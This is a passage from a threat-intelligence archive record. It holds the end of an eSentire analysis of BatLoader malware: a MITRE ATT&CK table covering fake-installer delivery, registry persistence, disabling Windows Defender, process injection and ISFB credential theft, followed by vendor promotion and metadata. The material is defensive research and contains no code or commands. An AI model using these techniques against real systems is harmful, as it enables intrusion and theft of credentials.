Description\r\nInitial Access | T1189 | Drive-by Compromise | BatLoader is delivered via fake software installers\r\nUser Execution | T1204.002 | Malicious File | The user launches the malicious MSI file\r\nPersistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | As a result of BatLoader infection, ISFB malware creates the persistence via Registry Run Keys. Syncro RMM can also be used as a persistence mechanism\r\nDefense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools | Disabling Windows Defender notifications, Task Manager and Command Prompt\r\nProcess Injection | T1055 | (technique not listed) | ISFB injects itself into explorer.exe as a result of successful BatLoader infection\r\nUnsecured Credentials | T1552.001 | Unsecured Credentials: Credentials In Files | The ISFB version observed is capable of accessing browser credentials and cookies, Thunderbird and Outlook profiles, POP3, SMTP passwords.\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next Level\r\nMDR, connect with an eSentire Security Specialist now.\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. 
TRU is an elite team of threat hunters and researchers that supports our 24/7 Security\r\nOperations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an\r\nextension of your security team to continuously improve our Managed Detection and Response service. By providing\r\ncomplete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat\r\nhunts augmented by original threat research, we are laser-focused on defending your organization against known and\r\nunknown threats.\r\nSource: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader"
	],
	"report_names": [
		"esentire-threat-intelligence-malware-analysis-batloader"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434704,
	"ts_updated_at": 1775826709,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fae8f21f020f637b2c3bbc993334632d9a4f9936.pdf",
		"text": "https://archive.orkl.eu/fae8f21f020f637b2c3bbc993334632d9a4f9936.txt",
		"img": "https://archive.orkl.eu/fae8f21f020f637b2c3bbc993334632d9a4f9936.jpg"
	}
}